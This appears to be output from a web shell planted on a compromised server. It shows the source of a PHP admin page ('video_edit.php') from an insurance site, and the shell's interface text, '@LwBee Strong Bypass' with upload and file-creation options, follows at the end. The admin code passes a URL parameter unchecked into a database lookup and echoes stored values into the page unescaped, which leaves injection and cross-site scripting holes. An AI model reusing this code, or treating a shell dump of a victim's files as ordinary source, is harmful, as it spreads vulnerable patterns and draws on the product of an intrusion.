/home3/vehiclea/public_html/admin-keerthiinsurane-com/video_edit.php
<?php
include('include/header.php');
if(!empty($_GET['editId']))
{
$select_video = select_vedio_data($_GET['editId']);
$video = mysqli_fetch_array($select_video);
}
?>
<body>
<!-- ======= Header ======= -->
<!-- ======= Sidebar ======= -->
<main id="main" class="main">
<div class="pagetitle">
<h1>Dashboard</h1>
<nav>
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="dashboard.php">Dasboard</a></li>
<li class="breadcrumb-item active">Video Edit Page</li>
</ol>
</nav>
</div><!-- End Page Title -->
<?php
if(!empty($_POST['submit'])){
$insert = video_update_data();
}
?>
<section>
<div class="container">
<h5 class="text-center"><strong>Add Video</strong></h5>
<div class="row">
<?php
if(!empty($_GET['succ']))
{
?>
<div align="center" style="color:green;"> <h4>Data Insert Successfully</h4></div>
<?php
}
?>
<form method="post" enctype="multipart/form-data" onsubmit="return video_validation()">
<div class="col-md-6 mt-4">
<label for="inputText" class="col-sm-2 col-form-label"> Name</label>
<input type="text" name="name" id="name" class="form-control" placeholder="Enter Name" value="<?php echo $video['name']?>">
<div class="error" id="err1" align="center" style="color:red;"></div>
</div>
<div class="col-md-6 mt-4">
<label for="inputText" class="col-sm-2 col-form-label">VideoLink</label>
<input class="form-control" type="text" id="link" name="link" value="<?php echo $video['video_link']?>">
<div class="error" id="err3" align="center" style="color:red;"></div>
</div>
<div class="col-md-6 mt-4">
<label for="inputText" class="col-sm-2 col-form-label">status</label>
<select name="status" id="status" class="form-control">
<option value="1" <?php if($video->status == 1){ echo 'selected';}?>>Active</option>
<option value="2" <?php if($video->status == 2){ echo 'selected';}?>>Inactive</option>
</select>
</div>
<div class="col-md-6 mt-4">
<input type="hidden" name="editData" value="<?php echo $video['id']?>">
<input type="submit" name="submit" value="Submit" class="btn btn-primary">
</div>
</form>
</div>
</div>
</section>
</main><!-- End #main -->
<?php
include('include/footer.php');
?>
<script src="https://cloud.tinymce.com/5/tinymce.min.js"></script>
<script>
tinymce.init({
selector: '.textarea-tiny',
height: 500,
menubar: false,
width: '100%',
plugins: [
// 'advlist autolink lists link image charmap print preview anchor textcolor',
// 'searchreplace visualblocks code fullscreen',
// 'insertdatetime media table paste code help wordcount'
'advlist autolink lists link image charmap print preview hr anchor pagebreak',
'searchreplace wordcount visualblocks visualchars code fullscreen',
'insertdatetime media nonbreaking save table contextmenu directionality',
'emoticons template paste textcolor colorpicker textpattern imagetools codesample toc'
],
toolbar: 'undo redo | formatselect | bold italic backcolor | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | removeformat | help',
image_advtab: true,
content_css: [
'//fonts.googleapis.com/css?family=Lato:300,300i,400,400i',
'//www.tiny.cloud/css/codepen.min.css'
]
});
</script>
<style>
div.mce-branding-powered-by{
display: none;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
function video_validation(){
if ($('#name').val() == '') {
valid_error("name", "Enter Name", "err1");
return false;
}
else if ($('#image').val() == '') {
$('#err1').hide();
valid_error("image", "Choose Image", "err2");
return false;
}
else if ($('#link').val() == '') {
$('#err2').hide();
valid_error("link", "Apply video link", "err3");
return false;
}
else
{
return true;
}
}
function valid_error(id, error, err) {
$('.errr').html('');
$('#' + err).show();
$('#' + err).html(error);
$('#' + id).focus();
return false;
}
</script>
@LwBee Strong Bypass
Upload File
Create New File